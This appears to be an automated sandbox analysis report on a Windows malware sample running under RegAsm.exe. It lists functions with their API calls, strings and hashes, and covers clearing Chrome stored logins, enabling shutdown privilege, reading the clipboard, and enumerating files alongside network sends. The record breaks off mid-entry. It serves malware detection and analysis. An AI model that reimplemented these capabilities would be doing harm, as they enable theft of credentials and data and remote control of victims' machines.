API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: !D@$PowrProf.dll$SetSuspendState
API String ID: 1589313981-2876530381
Opcode ID: 9fcdfdf2e70f192820140de20959d418043f044d0dc70dfb4a0c18ce04bd27c8
Instruction ID: f6c6f585a36de8121c5df69adef47d76b6904e2c2d247bbf37b4588cde2b2bc5
Opcode Fuzzy Hash: 9fcdfdf2e70f192820140de20959d418043f044d0dc70dfb4a0c18ce04bd27c8
Instruction Fuzzy Hash: 87216FB060430156CE14FBB28896ABF72599F41788F41483FB542AB2D2EF3CD845CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B960 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B99C
GetLastError.KERNEL32 ref: 0040B9A6

Strings

\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B967
[Chrome StoredLogins found, cleared!], xrefs: 0040B9CC
[Chrome StoredLogins not found], xrefs: 0040B9C0
UserProfile, xrefs: 0040B96C

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: b827c5fc418e544337e776d4383bf840cd7da94323f47ab98b09c0da0df255b3
Instruction ID: eb8c66327cbd9852b634475a7665cab754f13b7e32d1a4412a60f723b3e04143
Opcode Fuzzy Hash: b827c5fc418e544337e776d4383bf840cd7da94323f47ab98b09c0da0df255b3
Instruction Fuzzy Hash: 83018FB1A401056ACA047BB6DD5B9BE7728E911704F50027BF902722E2FE7D49098ADE

Uniqueness

Uniqueness Score: -1.00%

Function 004178A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 004178AD
OpenProcessToken.ADVAPI32(00000000), ref: 004178B4
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004178C6
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004178E5
GetLastError.KERNEL32 ref: 004178EB

Strings

SeShutdownPrivilege, xrefs: 004178C0

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5

Uniqueness

Uniqueness Score: -1.00%

Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00409258

Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

__CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
FindClose.KERNEL32(00000000), ref: 004093C1

Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C

FindClose.KERNEL32(00000000), ref: 004095B9

Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
String ID:
API String ID: 1824512719-0
Opcode ID: 1c1a594c42aabc848e56ce2cef418c3aab6d3cdb7745cb6edff4e7031036220e
Instruction ID: 682ac26ed7e8a3fec7eea21b1f58d506290f673c60e7927747fbe341be509488
Opcode Fuzzy Hash: 1c1a594c42aabc848e56ce2cef418c3aab6d3cdb7745cb6edff4e7031036220e
Instruction Fuzzy Hash: 82B18E32900109AACB04FBA1DD96AEDB379AF04314F10417FF506B61E2EF785E49CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041A998 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A5EE,00000000), ref: 0041A9A1
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A5EE,00000000), ref: 0041A9B6
CloseServiceHandle.ADVAPI32(00000000,?,0041A5EE,00000000), ref: 0041A9C3
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A5EE,00000000), ref: 0041A9CE
CloseServiceHandle.ADVAPI32(00000000,?,0041A5EE,00000000), ref: 0041A9E0
CloseServiceHandle.ADVAPI32(00000000,?,0041A5EE,00000000), ref: 0041A9E3

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: f0a41ace0033e4adc6ed211f5b9a4713447c101ebbe7debfeabf45247fd2b7b8
Instruction ID: 1f56653cd1b33a3082ec54d54fd8d4841359485faa7b6e76ca92d08d0c7a47ff
Opcode Fuzzy Hash: f0a41ace0033e4adc6ed211f5b9a4713447c101ebbe7debfeabf45247fd2b7b8
Instruction Fuzzy Hash: BFF0E9B1111225AFD2115B219C88DFF376CDF81B66B00082AF901921919B68CC85B579

Uniqueness

Uniqueness Score: -1.00%

Function 0045237D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0045269C,?,00000000), ref: 00452416
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0045269C,?,00000000), ref: 0045243F
GetACP.KERNEL32(?,?,0045269C,?,00000000), ref: 00452454

Strings

ACP, xrefs: 0045239B
OCP, xrefs: 004523D1

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 8109e71563a39a3b26d0eb2584ef597fedb24f2fc8293daa357ab739a01d4f79
Instruction ID: d01d4c930f94fe8d1e613ea2bb83b6ad54fccc02e3db7858a1f0680e3809c62e
Opcode Fuzzy Hash: 8109e71563a39a3b26d0eb2584ef597fedb24f2fc8293daa357ab739a01d4f79
Instruction Fuzzy Hash: E521E532700200A6DB358B25DA00B9B73A6EF57B13F168467ED09D7212E7BADD45C358

Uniqueness

Uniqueness Score: -1.00%

Function 0041B3F6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 0041B407
LoadResource.KERNEL32(00000000,?,?,0040F32C,00000000), ref: 0041B41B
LockResource.KERNEL32(00000000,?,?,0040F32C,00000000), ref: 0041B422
SizeofResource.KERNEL32(00000000,?,?,0040F32C,00000000), ref: 0041B431

Strings

SETTINGS, xrefs: 0041B3FA

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction ID: fc30b558c4419b0a31bdf043ab49805da964fa505f7a1de0fc394f039a43b5e3
Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction Fuzzy Hash: 98E01A36600B22EBEB211BA5AC4CD463E29F7C97637140075F90696231CB758840DAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040966A
FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: b4b72a32f38600e6eb1f176ff236d26e6995e1f241d40e8bf8ae6dcc2af17402
Instruction ID: 070a9d5dece77f020f22c6d3047f7193b13bcd532efb7b5f68a00bb5efad3e6d
Opcode Fuzzy Hash: b4b72a32f38600e6eb1f176ff236d26e6995e1f241d40e8bf8ae6dcc2af17402
Instruction Fuzzy Hash: 40811C329001199ACB15EBA1DC969EEB378AF14318F10417FE506B71E2FF789E49CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00452551 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153

Part of subcall function 004480D5: _free.LIBCMT ref: 00448134
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 00448141

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045265D
IsValidCodePage.KERNEL32(00000000), ref: 004526B8
IsValidLocale.KERNEL32(?,00000001), ref: 004526C7
GetLocaleInfoW.KERNEL32(?,00001001,004449AC,00000040,?,00444ACC,00000055,00000000,?,?,00000055,00000000), ref: 0045270F
GetLocaleInfoW.KERNEL32(?,00001002,00444A2C,00000040), ref: 0045272E

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: fa1670b29e0cff1f476005e56d7a6401a52f80e4e2cf6494cd076bea83c8f255
Instruction ID: 230a0f2966f322ebe53ce31d65220e852efde1a8d6b26a963b9ac082dbe1daf9
Opcode Fuzzy Hash: fa1670b29e0cff1f476005e56d7a6401a52f80e4e2cf6494cd076bea83c8f255
Instruction Fuzzy Hash: 4A51A471900209ABDF10DFA5DD45BBF73B8AF06702F08056BED04E7252E7B899498B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408811
FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
__CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$File$CloseException@8FirstH_prologNextThrow
String ID:
API String ID: 1771804793-0
Opcode ID: 98882c3fb8c382ebf1d08c0d059c7b5ad1d191f9937145677da36107fcb1e2f7
Instruction ID: f4c76a25ae066abca739e86e51e7a0462eedc1fe756a7d18505f7f1389ca0f1f
Opcode Fuzzy Hash: 98882c3fb8c382ebf1d08c0d059c7b5ad1d191f9937145677da36107fcb1e2f7
Instruction Fuzzy Hash: E8515172900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

XPG, xrefs: 00407877
XPG, xrefs: 0040793A

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID: XPG$XPG
API String ID: 4113138495-1962359302
Opcode ID: 14c1699da15a9e63e00a9128c6f448de2082dfa148026a3cc14952ef30f138f5
Instruction ID: 30f2f091d1745287e7c5bdc4e0ba67ea9086f55c29d946c5ca09ee25448eee69
Opcode Fuzzy Hash: 14c1699da15a9e63e00a9128c6f448de2082dfa148026a3cc14952ef30f138f5
Instruction Fuzzy Hash: 2D2186315043415BC314F761D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B

Uniqueness

Uniqueness Score: -1.00%

Function 00452004 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153

Part of subcall function 004480D5: _free.LIBCMT ref: 00448134
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 00448141

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452058
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004520A9
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452169

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: 7f6a73b4c1a337f8cdfffcc3746213a0a2295b303bf7df5f7f28e86f06d27cc4
Instruction ID: 532fc222645340eff7d03ca33bc0d43134e9c9b1347fe7fb292f935410b2db51
Opcode Fuzzy Hash: 7f6a73b4c1a337f8cdfffcc3746213a0a2295b303bf7df5f7f28e86f06d27cc4
Instruction Fuzzy Hash: 9661C6715006079BDB289F24CD81B7B77A8EF16306F1440BBED05C6642E7BCD989CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0043BA62 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0043BB5A
SetUnhandledExceptionFilter.KERNEL32 ref: 0043BB64
UnhandledExceptionFilter.KERNEL32(?), ref: 0043BB71

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 746003413ed7b55a61a58ca26f031048129a6ec48332726f906752ece0112a1b
Instruction ID: d29b4e4800c69824215c5a2b3b35faf60103cc188d69a8354f5a8ed3bad17319
Opcode Fuzzy Hash: 746003413ed7b55a61a58ca26f031048129a6ec48332726f906752ece0112a1b
Instruction Fuzzy Hash: 2531C67590122C9BCB21DF64D8897CDB7B4EF08311F5051EAE91CA6251E7349F818F49

Uniqueness

Uniqueness Score: -1.00%

Function 0040B65C Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 0040B65F
GetClipboardData.USER32 ref: 0040B66B
CloseClipboard.USER32 ref: 0040B673

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: 519ef2c27197b8d96ba826a5c3e8c472a064a98dfaa986ceeee74c7c82622cfa
Instruction ID: 12cbdee9a8fd4f9d33682b6f823f9a7816142bf9e60be8ebe326d1ace0c113b9
Opcode Fuzzy Hash: 519ef2c27197b8d96ba826a5c3e8c472a064a98dfaa986ceeee74c7c82622cfa
Instruction Fuzzy Hash: E6E08C30205320EFC2205B609C0CB8A67509F85B52F024A3ABC85AA2D0DB39CC00C6AE

Uniqueness

Uniqueness Score: -1.00%

Function 0044E739 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 0044E8CC

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: dc0712fa7fc22e2bcbef322fc7251c02cebb5c1f2696d8694b0213b3fa006e31
Instruction ID: 9a08145240ac113de0c1c9c2121780b2747914672e39122452537b4e0214a7b0
Opcode Fuzzy Hash: dc0712fa7fc22e2bcbef322fc7251c02cebb5c1f2696d8694b0213b3fa006e31
Instruction Fuzzy Hash: 3F312471900249AFEB249E7ACC84EEB7BBDEF85318F0441AEF81897251E6349D408B54

Uniqueness

Uniqueness Score: -1.00%

Function 00451EDC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153

EnumSystemLocalesW.KERNEL32(00452004,00000001,00000000,?,004449AC,?,00452631,00000000,?,?,?), ref: 00451F4E

Strings

1&E, xrefs: 00451F23

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: 1&E
API String ID: 1084509184-528507022
Opcode ID: 6042bf35db955c8155168cdea4bd964db26141be6ffdfaba86cbec483356b97a
Instruction ID: 7ccab57252c86bdbc2332e9d9a1a7588b25c389669ebfe4ed4bb9db7d5cf98d5
Opcode Fuzzy Hash: 6042bf35db955c8155168cdea4bd964db26141be6ffdfaba86cbec483356b97a
Instruction Fuzzy Hash: 911148372003059FDB189F39C8916BBB791FF80369B14442EED8687B51D775B906C744

Uniqueness

Uniqueness Score: -1.00%

Function 004487AD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 00448800

Strings

GetLocaleInfoEx, xrefs: 004487C8

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 7d2275f0dc408dd1e7fbf9b9364bdc59a474ea8d9c6957143a06c8e3c18eda4d
Instruction ID: 59b7edac1ee3b9a1fc61ec009b02a66a74686443aee658c776b66ba69a57392f
Opcode Fuzzy Hash: 7d2275f0dc408dd1e7fbf9b9364bdc59a474ea8d9c6957143a06c8e3c18eda4d
Instruction Fuzzy Hash: 03F02B31A00308F7DB01AF61DC01FAE7B61DF04712F10456EFC0526262CE759D159A9D

Uniqueness

Uniqueness Score: -1.00%

Function 00451C19 Relevance: 3.2, APIs: 2, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004449B3,?,?,?,?,?,?,00000004), ref: 00451CFB
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004449B3,00000000,00444AD3), ref: 00451E3C

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 1661935332-0
Opcode ID: 14a764fd6ed12dfdcaa65424ebdbb9bd7c0f192dfb7e073e066ce26d79732a85
Instruction ID: 14b133ae5c81331acca561b47ce8062aaa11cc7e398ae8fc4233077d85e48ad0
Opcode Fuzzy Hash: 14a764fd6ed12dfdcaa65424ebdbb9bd7c0f192dfb7e073e066ce26d79732a85
Instruction Fuzzy Hash: 45610A71600205AAE725AB36CC46BAB73A8EF04306F14442FFD05D7292EB79ED48C768

Uniqueness

Uniqueness Score: -1.00%

Function 00434BBD Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434BD6

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 1fb662f9d5325c0f23c7812fc6a7f30a555445cc8dd25cbbcf572d2ad0998a78
Instruction ID: 3301b740abdcbacea7dd71330f6aadb5f18b44dfaffec4a94e7b6a3b36366054
Opcode Fuzzy Hash: 1fb662f9d5325c0f23c7812fc6a7f30a555445cc8dd25cbbcf572d2ad0998a78
Instruction Fuzzy Hash: 0C5190B1D012088FEB24CFA9D88569EBBF4FB48314F25946BD418E7360D338A940CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00452254 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153

Part of subcall function 004480D5: _free.LIBCMT ref: 00448134
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 00448141

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 7fba601ea237378da0a977c6d17b643b08c3bbb2c23d121bede84fc2343487d0
Instruction ID: 4fe845b936be1eb8fdcbb114edd566682b4e2bd66d9e4785f410dba98d0612dd
Opcode Fuzzy Hash: 7fba601ea237378da0a977c6d17b643b08c3bbb2c23d121bede84fc2343487d0
Instruction Fuzzy Hash: FA21A172510206ABDB249E25DD41ABB73A8EF46316F1001BBFD05C6242EBBC9D49CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00452484 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452222,00000000,00000000,?), ref: 004524B0

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 9d656f9379a7b598a5a8f503f6b0d832b9571a3900ff8c3681835d602033eb24
Instruction ID: f34ea85dd6e778248c48bb084e231636f9c5f88c26065830af7cae6304855a84
Opcode Fuzzy Hash: 9d656f9379a7b598a5a8f503f6b0d832b9571a3900ff8c3681835d602033eb24
Instruction Fuzzy Hash: A3F04932610115BBEB249A258D05BBB7758EB42329F05442BEC05A3641EABCFD09C6D8

Uniqueness

Uniqueness Score: -1.00%

Function 00451F77 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
